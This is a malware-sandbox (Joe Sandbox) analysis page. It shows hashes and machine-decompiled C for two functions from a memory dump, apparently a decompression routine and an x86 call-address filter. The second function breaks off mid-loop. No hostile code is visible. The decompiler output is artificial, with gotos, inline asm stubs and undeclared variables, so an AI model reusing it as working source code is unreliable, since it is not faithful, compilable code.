Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
Instruction ID: 69596345ce0431953bf2d8feaec903d139fc653b635888a1d269324fb15cf725
Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
Instruction Fuzzy Hash: 5D523B726047058FC718CF19C891A6AF7E1FFCC304F498A2DE5859B255D734EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00076A7B Relevance: .5, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00076A7B(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x38);
				 *(_t455 + 0x18) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x18) = _t201;
						 *(_t455 + 0x14) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x10) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E000835DE(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00066EFD(0xa0f50);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x28) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E0006A800(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x20));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E0006A800(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E0006A800(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x28))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x18);
														_t201 =  *(_t455 + 0x1c);
														_t293 =  *(_t455 + 0x10);
														_t443 =  *((intOrPtr*)(_t455 + 0x20));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x18);
											_t201 =  *(_t455 + 0x1c);
											_t293 =  *(_t455 + 0x10);
											continue;
										}
										_push(_t455 + 0x2c);
										E00073952(_t443, _t438);
										_t295[1] =  *(_t455 + 0x2c) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x30);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x38) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x34);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x14) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E0006A800(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x14) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E0006A800(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x24) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x14) + 1;
												 *(_t455 + 0x14) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x14) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x14) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x28);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x14);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E0007815A(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x24);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E0007815A(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x24);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E0006A800(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E00073D6D(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}

0x00076a80
0x00076a86
0x00076a8e
0x00076ab5
0x00076ab8
0x00076abe
0x00076ac1
0x00076ac3
0x00076adb
0x00076ae2
0x00076ae4
0x00076ae7
0x00076aeb
0x00076af0
0x00076af2
0x00076af4
0x00076af6
0x00076af6
0x00076af8
0x00076afc
0x00076afc
0x00076afe
0x00076b00
0x00000000
0x00000000
0x00076b02
0x00076b02
0x00076b04
0x0007707b
0x0007707c
0x00000000
0x0007707c
0x00076b0a
0x00076b18
0x00076b18
0x00076b1a
0x00076b29
0x00076b29
0x00076b2f
0x00077074
0x00077074
0x00000000
0x00077074
0x00000000
0x00076b2f
0x00076b1c
0x00076b23
0x00000000
0x00000000
0x00000000
0x00076b23
0x00076b0c
0x00076b0f
0x00076b12
0x00000000
0x00000000
0x00000000
0x00076b35
0x00076b35
0x00076b3e
0x00076b44
0x00076b46
0x00076b49
0x00076b52
0x00076b53
0x00076b5e
0x00076b62
0x00076b64
0x00076b6b
0x00076b6b
0x00076b70
0x00076b70
0x00076b76
0x00076b81
0x00076b88
0x00076b8c
0x00076b92
0x00076b99
0x00076b9f
0x00076ba5
0x00076ba9
0x00076bd6
0x00076bd7
0x00076bd8
0x00076bda
0x00076bf3
0x00076bf6
0x00076bfd
0x00076c00
0x00076c03
0x00076c0b
0x00076c14
0x00076c18
0x00076c1a
0x00076c1d
0x00076c1f
0x00076c1f
0x00076c21
0x00000000
0x00076c21
0x00076bdf
0x00076be2
0x00076be2
0x00076be4
0x00000000
0x00000000
0x00076be6
0x00076be7
0x00076bea
0x00076bed
0x00000000
0x00000000
0x00000000
0x00076bef
0x00076bf1
0x00000000
0x00076bab
0x00076bad
0x00076bb0
0x00076bba
0x00076bc2
0x00076bc7
0x00076bca
0x00076c29
0x00076c2e
0x00076c30
0x00076c7e
0x00076c84
0x00076ef7
0x00076ef9
0x00076f4a
0x00076f50
0x00076f5f
0x00076f60
0x00076f6a
0x00076f6d
0x00076f74
0x00076f7a
0x00076f80
0x00076f87
0x00076fb4
0x00076fb5
0x00076fb6
0x00076fb8
0x00076fd4
0x00076fd7
0x00076fde
0x00076fe1
0x00076fe4
0x00076fef
0x00076ffb
0x00076ffd
0x00077003
0x00077005
0x00077005
0x00077007
0x0007700f
0x0007700f
0x00077012
0x00077015
0x00077023
0x00077026
0x0007702e
0x00077031
0x00077033
0x00077037
0x0007703e
0x00077046
0x00077048
0x0007704f
0x00077051
0x00077051
0x00077054
0x00077054
0x00077017
0x00077017
0x00077017
0x0007705b
0x0007705f
0x0007705f
0x00077063
0x00077067
0x0007706b
0x00076afc
0x00076afc
0x00076afe
0x00076b00
0x00000000
0x00000000
0x00000000
0x00076b00
0x00076afc
0x00076fc0
0x00076fc3
0x00076fc3
0x00076fc5
0x00000000
0x00000000
0x00076fc7
0x00076fc8
0x00076fcb
0x00076fce
0x00000000
0x00000000
0x00000000
0x00076fd0
0x00076fd2
0x00000000
0x00076fd2
0x00076f8b
0x00076f8e
0x00076f98
0x00076fa0
0x00076fa5
0x00076fa8
0x00000000
0x00076fa8
0x00076f52
0x00076c5f
0x00076c5f
0x00076c63
0x00076c67
0x00000000
0x00076c67
0x00076f01
0x00076f03
0x00076f0d
0x00076f15
0x00076f1a
0x00076f1b
0x00076f1d
0x00076f26
0x00076f2d
0x00076f38
0x00076f40
0x00076f42
0x00000000
0x00076f42
0x00076c8a
0x00076c90
0x00076c93
0x00076ca0
0x00076ca3
0x00076ca9
0x00076ca9
0x00076c95
0x00076c95
0x00076c95
0x00076cab
0x00076cae
0x00076cb2
0x00076cb4
0x00076cb8
0x00076cbf
0x00076cc9
0x00076ccb
0x00076cd4
0x00076cd6
0x00076cd6
0x00076cd9
0x00076cd9
0x00076cde
0x00076ce5
0x00076ceb
0x00076cf1
0x00076cf8
0x00076d25
0x00076d26
0x00076d27
0x00076d29
0x00076d45
0x00076d48
0x00076d4f
0x00076d52
0x00076d55
0x00076d60
0x00076d6c
0x00076d6e
0x00076d74
0x00076d76
0x00076d76
0x00076d78
0x00000000
0x00076d78
0x00076d31
0x00076d34
0x00076d34
0x00076d36
0x00000000
0x00000000
0x00076d38
0x00076d39
0x00076d3c
0x00076d3f
0x00000000
0x00000000
0x00000000
0x00076d41
0x00076d43
0x00000000
0x00076cfa
0x00076cfc
0x00076cff
0x00076d09
0x00076d11
0x00076d16
0x00076d19
0x00076d80
0x00076d80
0x00076d83
0x00076d86
0x00076d96
0x00076d99
0x00076d99
0x00076d88
0x00076d88
0x00076d88
0x00076d9b
0x00076d9c
0x00076da0
0x00076da2
0x00076da4
0x00076eb2
0x00076eb2
0x00076eb8
0x00076ebe
0x00076ebf
0x00076ec3
0x00076ec9
0x00076ecb
0x00076ecc
0x00076ed0
0x00076ed6
0x00076ed8
0x00076ed8
0x00076ed9
0x00076ed9
0x00076ed6
0x00076ec9
0x00076edd
0x00076ee5
0x00076eeb
0x00076eef
0x00000000
0x00076daa
0x00076daa
0x00076dad
0x00076e8e
0x00076e97
0x00076e9f
0x00076ea3
0x00076eaa
0x00076eac
0x00076eac
0x00076eaf
0x00000000
0x00076eaf
0x00076db3
0x00076db7
0x00076dc0
0x00076dce
0x00076dd2
0x00076dd9
0x00076ddb
0x00076ddb
0x00076dde
0x00076dde
0x00076de3
0x00076dea
0x00076df0
0x00076df6
0x00076dfd
0x00076e2a
0x00076e2b
0x00076e2c
0x00076e2e
0x00076e4a
0x00076e4d
0x00076e54
0x00076e57
0x00076e5a
0x00076e65
0x00076e71
0x00076e73
0x00076e79
0x00076e7b
0x00076e7b
0x00076e7d
0x00000000
0x00076e7d
0x00076e36
0x00076e39
0x00076e39
0x00076e3b
0x00000000
0x00000000
0x00076e3d
0x00076e3e
0x00076e41
0x00076e44
0x00000000
0x00000000
0x00000000
0x00076e46
0x00076e48
0x00000000
0x00076dff
0x00076e01
0x00076e04
0x00076e0e
0x00076e16
0x00076e1b
0x00076e1e
0x00076e85
0x00076e88
0x00000000
0x00076e88
0x00076dfd
0x00076da4
0x00076cf8
0x00076c32
0x00076c39
0x00076c70
0x00076c70
0x00076c75
0x00076c78
0x00000000
0x00076c78
0x00076c3b
0x00076c3f
0x00000000
0x00000000
0x00076c41
0x00076c47
0x00076c48
0x00076c4b
0x00000000
0x00000000
0x00076c4d
0x00076c4e
0x00076c55
0x00076c59
0x00076c59
0x00076c59
0x00000000
0x00076c59
0x00076ba9
0x00076afc
0x00076ac5
0x00000000
0x00076a90
0x00076a93
0x00076a97
0x00076a9b
0x00076a9f
0x00076aa0
0x00076aa7
0x00000000
0x00076aa9
0x00076aa9
0x00000000
0x00076aa9
0x00076aa7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a595d732e87b0a715b7f88257363abbe606ef79dfae3b9d59408f561495fd7d6
Instruction ID: 29f937df4d3a299451b66a959fc71b4671459880ea2bbfc1a64e3a8c6131be3a
Opcode Fuzzy Hash: a595d732e87b0a715b7f88257363abbe606ef79dfae3b9d59408f561495fd7d6
Instruction Fuzzy Hash: 5612E4B1B04B068FC728CF28C8946B9B7E0FB54304F10893DE59BC7A81D779A895CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0006BE13 Relevance: .4, Instructions: 449
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0006BE13(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				char _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed char _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed char _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed int _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *((char*)(_t355 + 0x13)) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *((intOrPtr*)(_t355 + 0x13));
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x2c) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x38) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0x9e070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x2c);
						_t285 = 0;
